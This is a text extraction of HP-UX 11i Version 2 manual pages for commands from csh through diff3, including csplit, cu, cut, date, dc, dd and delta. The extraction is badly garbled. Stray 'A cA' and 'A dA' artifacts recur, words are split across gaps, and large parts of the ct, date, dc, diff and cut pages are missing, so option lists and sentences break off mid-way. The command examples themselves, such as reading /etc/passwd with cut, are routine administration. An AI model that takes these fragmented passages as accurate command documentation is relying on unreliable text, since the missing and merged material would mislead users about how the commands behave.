Terminal type is examined only the first time you attempt recognition.
To list all commands on the system along PATH, enter [Space]-[Ctrl]-[D].
The csh metasequence !˜ does not work.
In an international environment, character ordering is determined by the setting of LC_COLLATE, rather A cA
than by the binary ordering of character values in the machine collating sequence. This brings with it
certain attendant dangers, particularly when using range expressions in file name generation patterns.
For example, the command,
rm [a-z]*
might be expected to match all file names beginning with a lowercase alphabetic character. However, if
dictionary ordering is specified by LC_COLLATE, it would also match file names beginning with an
uppercase character (as well as those beginning with accented letters). Conversely, it would fail to match
letters collated after z in languages such as Norwegian.
The correct (and safe) way to match specific character classes in an international environment is to use a
pattern of the form:
rm [[:lower:]]*
This uses LC_CTYPE to determine character classes and works predictably for all supported languages
and codesets. For shell scripts produced on non-internationalized systems (or without consideration for
the above dangers), it is recommended that they be executed in a non-NLS environment. This requires
that LANG, LC_COLLATE, etc., be set to "C" or not set at all.
csh implements command substitution by creating a pipe between itself and the command. If the root
file system is full, the substituted command cannot write to the pipe. As a result, the shell receives no
input from the command, and the result of the substitution is null. In particular, using command substi-
tution for variable assignment under such circumstances results in the variable being silently assigned a
NULL value.
Relative path changes (such as cd ..), when in a symbolically linked directory, cause csh’s knowledge
of the working directory to be along the symbolic path instead of the physical path.
Prior to HP-UX Release 9.0, csh, when getting its input from a file, would exit immediately if unable to
execute a command (such as if it was unable to find the command). Beginning at Release 9.0, csh con-
tinues on and attempts to execute the remaining commands in the file. However, if the old behavior is
desired for compatibility purposes, set the environment variable EXITONERR to 1.
AUTHOR
csh was developed by the University of California, Berkeley and HP.
FILES
˜/.cshrc A csh script sourced (executed) at the beginning of execution by each shell.
See WARNINGS
˜/.login A csh script sourced (executed) by login shell, after .cshrc at login.
˜/.logout A csh script sourced (executed) by login shell, at logout.
/etc/passwd Source of home directories for ˜name.
/usr/bin/sh Standard shell, for shell scripts not starting with a #.
/etc/csh.login A csh script sourced (executed) before ˜/.cshrc and ˜/.login when
starting a csh login (analogous to /etc/profile in the POSIX shell).
/tmp/sh* Temporary file for <<.
SEE ALSO
cd(1), echo(1), kill(1), nice(1), sh(1), umask(1), access(2), exec(2), fork(2), pipe(2), umask(2), wait(2),
tty(7), a.out(4), environ(5), lang(5), regexp(5).
C Shell tutorial in Shells Users Guide .
A cA
NAME
csplit - context split
SYNOPSIS
csplit [-s] [-k] [-f prefix ] [-n number] file arg1 [ ... argn ]
DESCRIPTION
csplit reads file , separates it into n+1 sections as defined by the arguments arg1 ... argn , and places
the results in separate files. The maximum number of arguments (arg1 through argn ) allowed is 99
unless the -n number option is used to allow for more output file names. If the -f prefix option is
specified, the resulting filenames are prefix 00 through prefix NN where NN is the two-digit value of n
using a leading zero if n is less than 10. If the -f prefix option is not specified, the default filenames
xx00 through xxNN are used. file is divided as follows:
A cA
Default Prefixed
Filename Filename Contents
xx00 prefix00 From start of file up to (but not including) the line
referenced by arg1.
xx01 prefix01 From the line referenced by arg1 up to the line
referenced by arg2.
.
.
.
xxNN prefixNN From the line referenced by argn to end of file.
If the file argument is -, standard input is used.
csplit supports the Basic Regular Expression syntax (see regexp (5)).
Options
csplit recognizes the following options:
-s Suppress printing of all character counts (csplit normally prints the character
counts for each file created).
-k Leave previously created files intact (csplit normally removes created files if an
error occurs).
-f prefix Name created files prefix 00 through prefixNN (default is xx00 through xxNN.
-n number The output file name suffix will use number digits instead of the default 2. This
allows creation of more than 100 output files.
Arguments (arg1 through argn ) to csplit can be any combination of the following:
/regexp / Create a file containing the section from the current line up to (but not including)
the line matching the regular expression regexp . The new current line becomes the
line matching regexp .
/regexp /+n
/regexp /-n Create a file containing the section from the current line up to (but not including)
the nth before (-n) or after (+n) the line matching the regular expression regexp .
(e.g., /Page/-5). The new current line becomes the line matching regexp ±n lines.
%regexp % equivalent to /regexp /, except that no file is created for the section.
line_number Create a file from the current line up to (but not including) line_number . The new
current line becomes line_number .
{num } Repeat argument. This argument can follow any of the above argument forms. If it
follows a regexp argument, that argument is applied num more times. If it follows
line_number , the file is split every line_number lines for num times from that point
until end-of-file is reached or num expires.
{* } Repeats previous operand as many times as necessary to finish input.
Enclose in appropriate quotes all regexp arguments containing blanks or other characters meaningful to
the shell. Regular expressions must not contain embedded new-lines. csplit does not alter or remove
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−149
csplit(1) csplit(1)
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating regular expressions.
LC_CTYPE determines the characters matched by character class expressions in regular expressions.
LC_MESSAGES determines the language in which messages are displayed.
If LC_COLLATE orsplit behaves as if all internationalization
A cA variables are set to "C". See environ (5).
DIAGNOSTICS
Messages are self explanatory except for:
arg - out of range
which means that the given argument did not reference a line between the current position and the end of
the file. This warning also occurs if the file is exhausted before the repeat count is.
EXAMPLES
Create four files, cobol00 through cobol03. After editing the ‘‘split’’ files, recombine them back into
the original file, destroying its previous contents.
csplit -f cobol file ’/procedure division/’ /par5./ /par16./
Perform editing operations
cat cobol0[0-3] > file
Split a file at every 100 lines, up to 10,000 lines (100 files). The -k option causes the created files to be
retained if there are fewer than 10,000 lines (an error message is still printed).
csplit -k file 100 ’{99}’
Assuming that prog.c follows the normal C coding convention of terminating routines with a } at the
beginning of the line, create a file containing each separate C routine (up to 21) in prog.c.
csplit -k prog.c ’%main(%’ ’/ˆ}/+1’ ’{20}’
SEE ALSO
sh(1), split(1), environ(5), lang(5), regexp(5).
STANDARDS CONFORMANCE
csplit: SVID2, SVID3, XPG2, XPG3, XPG4
Section 1−−150 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
ct(1) ct(1)
NAME
ct - spawn getty to a remote terminal (call terminal)
SYNOPSIS
ct [-w n] [-x n] [-h] [-v] [-s speed ] telno ...
DESCRIPTION con-
A cA
nected use-
ful value is -x9.
-h Prevent ct from disconnecting ("hanging up") the current tty line. This option is
necessary if the user is using a different tty line than the one used by ct to spawn
the getty.
/var/adm/ctlog
/etc/uucp/Devices
SEE ALSO
cu(1), login(1), uucp(1), getty(1M), uugetty(1M).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−151
ctags(1) ctags(1)
NAME
ctags - create a tags file
SYNOPSIS
ctags [-xvFBatwu] files ...
DESCRIPTION
ctags makes a tags file for ex(1) (or vi (1)) from the specified C, Pascal and FORTRAN sources. A tags file
gives the locations of specified objects (for C, functions, macros with argments, and typedefs; Pascal, pro-
cedures,.
A cA Specifiers are given in separate fields on the line, separated by spaces or tabs. Using the tags file, ex
can quickly find these objects’ definitions.
-x Cause ctags to print a simple function index. This is done by assembling a list of func-
tion begin-
ning of name of the file, with any trailing .c removed, and leading pathname components also removed.
This makes use of ctags practical in directories with more than one program.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the order in which the output is sorted.
LC_CTYPE determines the interpretation of the single- and/or multi-byte characters within comments
and string literals. ‘‘C’’ (see lang (5)) is used instead of LANG. If any internationalization
variable contains an invalid setting, ctags behaves as if all internationalization variables are set to ‘‘C’’.
See environ (5).
Section 1−−152 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
ctags(1) ctags(1)
DIAGNOSTICS.
Duplicate entry in files file1 and file2 : name (Warning only).
The same name was detected in two different files. A tags entry was made only for the first name A cA
found.
EXAMPLES editing a
tags file.
If more than one (function) definition appears on a single line, only the first definition is indexed.
AUTHOR
ctags was developed by the University of California, Berkeley.
FILES
tags output tags file
OTAGS temporary file used by -u
SEE ALSO
ex(1), vi(1).
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−153
ctags(1) ctags(1)
STANDARDS CONFORMANCE
ctags: XPG4
A cA
Section 1−−154 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
cu(1) cu(1)
NAME
cu - call another (UNIX) system; terminal emulator
SYNOPSIS
cu [-s speed ] [-l line ] [-h] [-q] [-t] [-d level ] [-e-o] [-m] [-n] [ telno systemname dir ]
XPG4 Syntax:
cu [-s speed ] [-l line ] [-h] [-q] [-t] [-d] [-e-o] [-m] [-n] [ telno systemname dir ]
DESCRIPTION
cu calls up another system, which is usually a UNIX operating system, but can be a terminal or a non-
UNIX operating system. cu manages all interaction between systems, including possible transfers of
ASCII files.
Options
A cA over-
ride dev-
ice is usually a directly connected asynchronous line (such as /dev/ttyapb). In
this case, a telephone number is not required, but the string dir can be used to
specify that a dialer is not required. If the specified device is associated with an
auto-dialer, a telephone number must be provided.
-h Emulate local echo, supporting calls to other computer systems that expect termi-
nals to be set to half-duplex mode.
-q Use ENQ/ACK handshake (remote system sends ENQ, cu sends ACK.)
-t Used when dialing an ASCII terminal that has been set to auto-answer. Appropri-
ate mapping of carriage-return to carriage-return-line-feed pairs is set.
-dlevel Print diagnostic traces. level is a number from 0-9, where higher level s tele-
phone number or direct line for systemname in the Systems file until a connection
is made or all the entries are tried.
dir Using dir ensures that cu uses the line specified by the -l option.
After making the connection, cu runs as two processes:
• transmit process reads data from the standard input and, except for lines beginning with ˜,
passes it to the remote system;
• receive process accepts data from the remote system and, except for lines beginning with ˜,
passes it to the standard output.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−155
cu(1) cu(1)
Normally, an automatic DC3/DC1 protocol is used to control input from the remote to ensure that the
buffer is not overrun. "Prompt handshaking" can be used to control transfer of ASCII files to systems that
have no type-ahead capability but require data to be sent only after a prompt is given. This is described
in detail below. Lines beginning with ˜ have special meanings.
Section 1−−156 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
cu(1) cu(1)
Ctrl-X form where a circumflex (ASCII 94) precedes the character, as in ˆX. A null
character can be specified with ˆ@. (A null first character in the prompt implies a
"null" prompt, which always appears to be satisfied.) A circumflex is specified by
^ ˆ.
~%>[>]file Divert output from the remote system to the specified file until another ˜%> com-
mand is given. When an output diversion is active, typing ˜%> terminates it,
whereas ˜%> anotherfile terminates it and begins a new one. The output diversion
remains active through a ˜& subshell, but unpredictable results can occur if
input/output diversions are intermixed with ˜%take or ˜%put. The ˜%>> com-
mand appends to the named file. Note that these commands, which are interpreted
by the transmit process, are unrelated to the ˜> commands described below, which
are interpreted by the receive process.
~susp Suspend the cu session. susp is the suspend character set in the terminal when A cA
cu was invoked (usually ˆZ — see stty (1)). As in all other lines starting with tilde,
a ˜susp line must be terminated by pressing Return.
Receive Process
The receive process normally copies data from the remote system to its standard output. A line from the
remote that begins with ˜> initiates an output diversion to a file. The complete sequence is:
~>[>]: file
zero or more lines to be written to file
~>
Data from the remote is diverted (or appended, if >> is used) to file . The trailing ˜> terminates the
diversion.
The use of ˜%put requires stty (1) and cat (1) on the remote side. It also requires that the current erase
and kill characters on the remote system be identical to the current ones on the local system.
Backslashes are inserted at appropriate places.
The use of ˜ ˜˜ is used. For example, using the keyboard on sys-
tem X, uname can be executed on Z, X, and Y as follows where lines 1, 3, and 5 are keyboard commands,
and lines 2, 4, and 6 are system responses:
uname
Z
~!uname
X
~˜!uname
Y
In general, ˜ causes the command to be executed on the original machine; ˜˜ causes the command to be
executed on the next machine in the chain.
EXTERNAL INFLUENCES-
ization variables are set to "C". See environ (5).
DIAGNOSTICS
Exit code is zero for normal exit; non-zero (various values) otherwise.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−157
cu(1) cu(1)
EXAMPLES:
A cA cu -l/dev/culXpX 2015551212
To use a system name (yyyzzz):
cu yyyzzz
To connect directly to a modem:
cu -l/dev/culXX -m dir cu -l/dev/cu1XX -m dir
WARNINGS
cu buffers input internally.
AUTHOR
cu was developed by AT&T and HP.
FILES
/etc/uucp/Systems
/etc/uucp/Devices
/etc/uucp/Dialers
/var/spool/locks/LCK ..(tty-device)
/dev/null
SEE ALSO
cat(1), ct(1), echo(1), stty(1), uname(1), uucp(1), uuname(1).
STANDARDS CONFORMANCE
cu: SVID2, SVID3, XPG2, XPG3, XPG4
Section 1−−158 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
cut(1) cut(1)
NAME
cut - cut out (extract) selected fields of each line of a file
SYNOPSIS
cut -c list [ file ... ]
cut -b list [-n] [ file ... ]
cut -f list [-d char ] [-s] [ file ... ]
DESCRIPTION). A cA
Options are interpreted as follows:
list A comma-separated list of integer byte (-b option), character (-c option), or field (-f
option) numbers, in increasing order, with optional - to indicate ranges. For exam-
ple: char-
acter (see -d); for example, -f 1,7 copies the first and seventh field only. Lines
with no field delimiters will be passed through intact (useful for table subheadings),
unless -s is specified.
-d char The character following -d is the field delimiter (-f option only). Default is tab .
Space or other characters with special meaning to the shell must be quoted. Adja-
cent field delimiters delimit null fields. char may be an international code set char-
acter.
-n."
-s Suppresses lines with no delimiter characters when using -f option. Unless -s is
specified, lines with no delimiters appear in the output without alteration.
Hints
Environment Variables
LC_CTYPE determines the interpretation of text,
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−159
cut(1) cut(1)
a default of "C" (see lang (5)) is used instead of LANG. If any internationalization variable contains an
invalid setting, cut behaves as if all internationalization variables are set to "C". See environ (5).
EXAMPLES
Password file mapping of user ID to user names:
cut -d : -f 1,5 /etc/passwd
Set environment variable name to current login name:
A cA name=‘who am i | cut -f 1 -d " "‘
cut does not expand tabs. Pipe text through expand (1) if tab expansion is required.
Backspace characters are treated the same as any other character. To eliminate backspace characters
before processing by cut, use the fold or col command (see fold (1) and col (1)).
AUTHOR
cut was developed by OSF and HP.
SEE ALSO
grep(1), paste(1).
STANDARDS CONFORMANCE
cut: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−160 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
date. A dA adjust-
ment direc-
tive for all languages except the C default language. See Formatting Directives and EXAM-
PLES below.
date [-u] +format
Display the current date and time according to formatting directives specified in format ,
which is a string of zero or more formatting directives and ordinary characters. If it con-
tains blanks, enclose it in apostrophes or quotation marks.,
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−161.
A dA exam-
ple, 02.
Section 1−−162 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
date(1) date(1)
Obsolescent Directives
The following directives are provided for backward compatibility. It is recommended that the preceding
A dA.
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−163
date(1) date.
DIAGNOSTICS
The following messages may be displayed.
bad conversion
The date/time specification is syntactically incorrect. Check it against the usage and for the
correct range of each of the digit-pairs.
bad format character - c
The character c is not a valid format directive, field width specifier, or precision specifier.
do you really want to run time backwards?[yes/no]
The date/time you specified is earlier than the current clock value. Type yes (or the equivalent
Section 1−−164 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
date(1) date(1) → Fri Aug 20 15:03:37 PDT 1993 ← C (default)
date -u → Fri Aug 20 22:03:37 UTC 1993 ← C (default)
date → Fri, Aug 20, 1993 03:03:37 PM ← en_US.roman8 (U.S. English)
date → Fri. 20 Aug, 1993 03:03:37 PM ← en_GB.roman8 (U.K. English)
date → 20/08/1993 15.47.47 ← pt_PT.roman8 (Portuguese)
Set Date
A dA
Set the date to Oct 8, 12:45 a.m.
date 10080045
WARNINGS
The former HP-UX format directive A has been changed to W for ANSI compatibility.
Changing the date while the system is running in multiuser mode should be avoided to prevent disrupt-
ingtmps
SEE ALSO
locale(1), stime(2), ctime(3C), strftime(3C), tztab(4), environ(5), lang(5), langinfo(5).
STANDARDS CONFORMANCE
date: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
HP-UX 11i Version 2: August 2003 −5− Hewlett-Packard Company Section 1−−165
dc(1) dc(1)
NAME
dc - desk calculator
SYNOPSIS
dc [ file ]
DESCRIPTION stan-
dard input. An end of file on standard input or the q command stop dc. The following constructions are
recognized:
A dA number The value of the number is pushed on the stack. A number is an unbroken string of
the digits 0-9 or A-F. It can be preceded by an underscore (_) to input a negative
number. Numbers can contain decimal points.
+ - / * % ˆ
The top two values on the stack are added (+), subtracted (-), multiplied (*),
divided (/), remaindered (%), or exponentiated (ˆ). The two entries are popped off
the stack; the result is pushed on the stack in their place. Any fractional part of an
exponent is ignored and a warning generated. The remainder is calculated accord-
ing regis-
ters inter-
prets the top of the stack as an ASCII string, removes it, and prints it.
f All values on the stack are printed.
q exits the program. If executing a string, the recursion level is popped by two. If q
is capitalized,. Strings can be nested by
using nested pairs of brackets.
<x >x =x
! an HP-UX system command (unless the next charac-
ter is <, >, or =, in which case appropriate relational operator above is used).
c All values on the stack are popped.
i The top value on the stack is popped and used as the number radix for further
input.
Section 1−−166 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dc(1) dc(1)
DIAGNOSTICS.
Nesting Depth There are too many levels of nested execution.
EXAMPLES
This example prints the first ten values of n! (n factorial):
[la1+dsa*pla10>y]sy
0sa1
lyx
SEE ALSO
bc(1).
DC: An Interactive Desk Calculator tutorial in Number Processing Users Guide .
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−167
dd(1) dd(1)
NAME
dd - convert, reblock, translate, and copy a (tape) file
SYNOPSIS
dd [option =value ] ...
DESCRIPTION
dd copies the specified input file to the specified output file with possible conversions. The standard
input and output are used by default. Input and output block size can be specified to take advantage of
raw physical I/O. Upon completion, dd reports the number of whole and partial input and output
records.
Options
dd recognizes the following option =value pairs:
A dA if=file Input file name; default is standard input.
of=file Output file name; default is standard output. The output file is created using the
same owner and group used by creat().
ibs=n Input block size is n bytes; default is 512.
obs=n Output block size is n bytes; default is 512.
bs=n Set both input and output block size to the same size, superseding ibs and obs.
This option is particularly efficient if no conversion (conv option) is specified,
because no in-core copy is necessary.
cbs=n Conversion buffer size is n bytes.
skip=n Skip n input blocks before starting copy.
iseek=n Skip n input blocks before starting copy. (This is an alias for the skip option.)
seek=n Skip n blocks from beginning of output file before copying.
oseek=n Skip n blocks from beginning of output file before copying. (This is an alias for the
seek option.)
count=n Copy only n input blocks.
files=n Copy and concatenate n input files. This option should be used only when the input
file is a magnetic tape device.
conv=value [,value ...]
Where value s are comma-separated symbols from the following list.
ascii Convert EBCDIC to ASCII.
ebcdic Convert ASCII to EBCDIC.
ibm Convert ASCII to EBCDIC using an alternate conversion table.
The ascii, ebcdic, and ibm values are mutually exclusive.
block Convert each newline-terminated or end-of-file-terminated input
record to a record with a fixed length specified by cbs. Any
newline character is removed, and space characters are used to
fill the block to size cbs. Lines that are longer than cbs are
truncated; the number of truncated lines (records) is reported
(see DIAGNOSTICS below).
The block and unblock values are mutually exclusive.
unblock Convert fixed-length input records to variable-length records.
For each input record, cbs bytes are read, trailing space char-
acters are deleted, and a newline character is appended.
lcase Map upper-case input characters to the corresponding lower-
case characters.
The lcase and ucase values are mutually exclusive.
Section 1−−168 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dd(1) dd(1)
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
Environment Variables
The following environment variables affect execution of dd:
LANG determines the locale when LC_ALL and a corresponding variable (beginning with LC_) do not
specify a locale.
LC_ALL determines the locale used to override any values set by LANG or any environment variables
beginning with LC_.
The LC_CTYPE variable determines the locale for the interpretation of sequences of bytes of text data as
characters (single-byte/multi-byte characters, upper-case/lower-case characters).
The LC_MESSAGES variable determines the language in which messages are written.
RETURN VALUE
Exit values are:
0 Successful completion.
>0 Error condition occurred.
DIAGNOSTICS
Upon completion, dd reports the number of input and output records:
f +p records in Number of full and partial blocks read.
f +p records out Number of full and partial blocks written.
When conv=block is specified and there is at least one truncated block, the number of truncated
records is also reported:
n truncated records
EXAMPLES
Read an EBCDIC tape blocked ten 80-byte EBCDIC card images per block into an ASCII file named x:
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−169
dd(1) dd(1)
WARNINGS
Some devices, such as 1/2-inch magnetic tapes, are incapable of seeking. Such devices may be positioned
prior to running dd by using mt(1) or some other appropriate command. The skip, seek, iseek and
oseek
ibm conversion, while less widely accepted as a standard, corresponds better to certain IBM print train
conventions. There is no universal solution.
Newline characters are inserted only on conversion to ASCII; padding is done only on conversion to
A dA EBCDIC. These should be separate options.
If if or of refers to a raw disk, bs should always be a multiple of the sector size of the disk. By default,
bs is 512 bytes. If the sector size of the disk is different from 512 bytes, bs should be specified using a
multiple of sector size. The character special (raw) device file should always be used for devices.
It is entirely up to the user to insure there is enough room in the destination file, file system and/or device
to contain the output since dd cannot pre-determine the required space after conversion.
SEE ALSO
cp(1), mt(1), tr(1), disk(7), mt(7).
STANDARDS CONFORMANCE
dd: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
Section 1−−170 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
delta(1) delta(1)
NAME
delta - make a delta (change) to an SCCS file
SYNOPSIS
delta [-r SID ] [-s] [-n] [-g list ] [-m mrlist ] [-y comment ] [-p] files
DESCRIPTION
The delta command is used to permanently introduce into the named SCCS file changes that were made
to the file retrieved by get (called the g-file , or generated file). See get (1).
delta makes a delta to each named SCCS file. If a directory is named, delta behaves as though each
file in the directory was specified as a named file, except that non- SCCS files (last component of the path
name does not begin with .s) and unreadable files are silently ignored. If a name of - is given, the stan-
dard input is read (see WARNINGS). Each line of the standard input is taken to be the name of an SCCS
file to be processed.
delta may issue prompts on the standard output, depending upon certain options specified and flags A dA
(see admin (1)) that may be present in the SCCS file (see the -m and -y options below).
Options
Option arguments apply independently to each named file.
-rSID Uniquely identifies which delta is to be made to the SCCS file. Use of this option is
necessary only if two or more outstanding gets for editing (get -e) on the same
SCCS file were done by the same person (login name). The SID value specified with
the -r option can be either the SID specified on the get command line or the SID to
be made as reported by the get command (see get (1)). A diagnostic results if the
specified SID is ambiguous, or, if necessary and omitted on the command line.
-s Suppresses issuing, on the standard output, of the created delta’s SID as well as the
number of lines inserted, deleted and unchanged in the SCCS file.
-n Specifies retention of the edited g-file (normally removed at completion of delta pro-
cessing).
-glist Specifies a list (see get (1) for the definition of list ) of deltas which are to be ignored
when the file is accessed at the change level (SID ) created by this delta.
-m[mrlist] If the SCCS file has the v flag set (see admin (1)), a Modification Request (MR)
number must be supplied as the reason for creating the new delta. the -y option).
MRs in a list are separated by blanks and/or tab characters. An unescaped new-line
character terminates the MR list.
Note that if the v flag has a value (see admin (1)), it is assumed to be the name of a
program (or shell procedure) that is to validate the correctness of the MR numbers.
If a non-zero exit status is returned from the MR number-validation program,
delta assumes that the MR numbers were not all valid and terminates.
-y[comment] Arbitrary text used to describe the reason for making the delta. A null string is
considered a valid comment .
If -y is not specified and the standard input is a terminal, the prompt comments?
is issued on the standard output before the standard input is read. If the standard
input is not a terminal, no prompt is issued. An unescaped new-line character ter-
minates the comment text.
-p Causes delta to print (on the standard output in a diff(1) format) the SCCS file
differences before and after the delta is applied.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text as single- and/or multi-byte characters.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−171
delta(1) delta(1)
DIAGNOSTICS
Use sccshelp (1) for explanations.
WARNINGS
A dA SCCS files can be any length, but the number of lines in the text file itself cannot exceed 99 999 lines.
Lines beginning with an ASCII SOH character (octal 001) cannot be placed in the SCCS file unless the SOH
is escaped. This character has special meaning to SCCS (see sccsfile (4)) and will cause an error.
A get of many SCCS files, followed by a delta of those files, should be avoided when the get generates
a large amount of data. Instead, multiple get/delta sequences should be used.
If the standard input (-) is specified on the delta command line, the -m (if necessary) and -y options
must also be present. Omission of these options causes an error.
Comments can be of multiple lines. The maximum length of the comment (total length of all comment
lines) cannot exceed 1024 bytes. No line in a comment should have a length of more than 1000 bytes.
FILES
All of the auxiliary files listed below, except for the g-file , are created in the same directory as the s-file
(see get (1)). The g-file is created in the user’s working directory.
g-file Existed before the execution of delta; removed after completion of delta
(unless -n was specified).
p-file Existed before the execution of delta; may exist after completion of delta.
q-file Created during the execution of delta; removed after completion of delta.
x-file Created during the execution of delta; renamed to SCCS file after completion of
delta.
z-file Created during the execution of delta; removed during the execution of
delta.
d-file Created during the execution of delta; removed after completion of delta.
/usr/bin/bdiff Program to compute differences between the file retrieved by get and the g-file .
SEE ALSO
admin(1), bdiff(1), cdc(1), get(1), sccshelp(1), prs(1), rmdel(1), sccsfile(4).
STANDARDS CONFORMANCE
delta: SVID2, SVID3, XPG2, XPG3, XPG4
Section 1−−172 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
deroff(1) deroff(1)
NAME
deroff - remove nroff, tbl, and neqn constructs
SYNOPSIS
deroff [-mx ] [-w] [-i] [ file ... ]
DESCRIPTION
deroff reads each file in sequence and removes all nroff requests, macro calls, backslash constructs,
neqn constructs (between .EQ and .EN lines, and between delimiters — see neqn(1)), and tbl descrip-
tions (see tbl (1)), replacing them with white space (blanks and blank lines), and writes the remainder of
the file on the standard output. deroff follows chains of included files (.so and .nx nroff/troff
formatter commands); if a file has already been included, a .so naming that file is ignored and a .nx
naming that file terminates execution. If no input file is given, deroff reads the standard input.
The -m option can be followed by an m, s, or l. The -mm option causes the macros be interpreted such
that only running text is output (that is, no text from macro lines). The -ml option forces the -mm
option and also causes deletion of lists associated with the mm macros.
A dA
If the -w option is given, the output is a word list, one ‘‘word’’ per line, with all other characters deleted.
Otherwise, the output follows the original, with the deletions mentioned above. In text, a ‘‘word’’ is any
multi-byte character string or any string that contains at least two letters and is composed of letters,
digits, ampersands (&), and apostrophes (’); In a macro call, however, a ‘‘word’’ is a multi-byte character
string or a string that begins with at least two letters and contains a total of at least three letters. Delim-
iters are any characters other than letters, digits, apostrophes, and ampersands. Trailing apostrophes
and ampersands are removed from ‘‘words.’’
If the -i option is specified, deroff ignores the .so and .nx nroff/troff commands.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of text and filenames as single and/or multi-byte characters.
Note that multi-byte punctuation characters are not recognized when using the -w option., deroff behaves as if all internationali-
zation variables are set to "C". See environ (5).
WARNINGS
deroff is not a complete nroff interpreter; thus it can be confused by subtle constructs. Most such
errors result in too much rather than too little output.
The -ml option does not handle nested lists correctly.
AUTHOR
deroff was developed by the University of California, Berkeley.
SEE ALSO
neqn(1), nroff(1), tbl(1).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−173
dhcpv6client_ui(1) dhcpv6client_ui(1)
NAME
dhcpv6client_ui - DHCPv6 client interface for requesting configuration parameters from the DHCPv6
server.
SYNOPSIS
dhcpv6client_ui is the interface through which a user contacts the client daemon to obtain IP
A dA addresses and other configuration parameters from the server. The default configuration parameters are
specified as command line options when the DHCPv6 client daemon is invoked.
When dhcpv6client_ui requests for IP addresses or other configuration parameters, the client dae-
mon inter-
face instead of requesting new IP addresses from the server.
This option must be used in conjunction with the -m option.
Section 1−−174 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dhcpv6client_ui(1) dhcpv6client_ui(1)
RETURN VALUES
dhcpv6client_ui returns 0 on success and 1 on failure.
EXAMPLES
dhcpv6client_ui obtains two IP addresses for the lan0 interface:
dhcpv6client_ui -m lan0 -n 2
dhcpv6client_ui obtains two IP addresses for the lan0 interface and additional configuration
parameters:
dhcpv6client_ui -m lan0 -n 2 -o dns_sa dns_sx
FILES
/etc/dhcpv6client.data All the data obtained from the server daemon is saved to this file. A dA
AUTHOR
dhcpv6client_ui was developed by Hewlett-Packard.
SEE ALSO
dhcpv6clientd(1M), dhcpv6d(1M).
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−175
diff reg-
ular file diff algorithm (described below) on text files that have the same name in each directory but
are different. Binary files that differ, common subdirectories, and files that appear in only one directory
are listed. When comparing directories, the following options are recognized:
A dA
When run on regular files, and when comparing text files that differ during directory comparison, diff
tells what lines must be changed in the files to bring them into agreement. diff usually finds a smal-
lest fol-
lowing: mutu-
ally
Section 1−−176 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
diff(1) diff(1) con-
trols included so that a compilation of the result without defining string is equivalent to
compiling file1 , while compiling. A dA
inter-
nationalization variables are set to "C". See environ (5).
RETURN VALUE
Upon completion, diff returns with one of the following exit values:
0 No differences were found.
1 Differences were found.
>1 An error occurred.
EXAMPLES.
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−177
diff(1) diff(1)
diff -wi x1 x2
WARNINGS.
A dA
diff was developed by AT&T, the University of California, Berkeley, and HP.
Section 1−−178 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
diff3(1) diff3(1)
NAME
diff3 - 3-way differential file comparison
SYNOPSIS
diff3 [-exEX3] file1 file2 file3
DESCRIPTION
diff3 compares three versions of a file, and prints disagreeing ranges of text flagged with these codes:
==== all three files differ
====1 file1 is different
====2 file2 is different
====3 file3 is different
The type of change required to convert a given range of a given file to some other is indicated in one of
these ways:
f :n1 a Text is to be appended after line number n1 in file f, where f = 1, 2, or 3.
A dA
f :n1 ,n2 c Text is to be changed in the range line n1 through line n2. If n1 = n2, the range
can be abbreviated to n1.
The original contents of the range follows immediately after a c indication. When the contents of two
files are identical, the contents of the lower-numbered file is suppressed.
-e diff3 Produces a script for the ed editor that can be used to incorporate into file1 all
changes between file2 and file3 (see ed(1)); i.e., the changes that normally would be
flagged ==== and ====3.
-x Produces a script to incorporate only changes flagged ====
-3 Produces a script to incorporate only changes flagged ====3
-E Produces a script that will incorporate all changes between file2 and file3 , but treat over-
lapping changes (that is, changes that would be flagged with ==== in normal listing)
differently. The overlapping lines in both files will be inserted by the edit script bracketed
by <<<<<< and >>>>>> lines.
-X Produces a script that will incorporate only changes flagged ==== , but treat these
changes in the manner of -E option.
The following command applies the resulting script to file1 .
(cat script; echo ’1,$p’) | ed - file1
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
WARNINGS
Text lines that consist of a single period (.) defeat -e.
Files longer than 64K bytes do not work.
FILES
/var/tmp/d3*
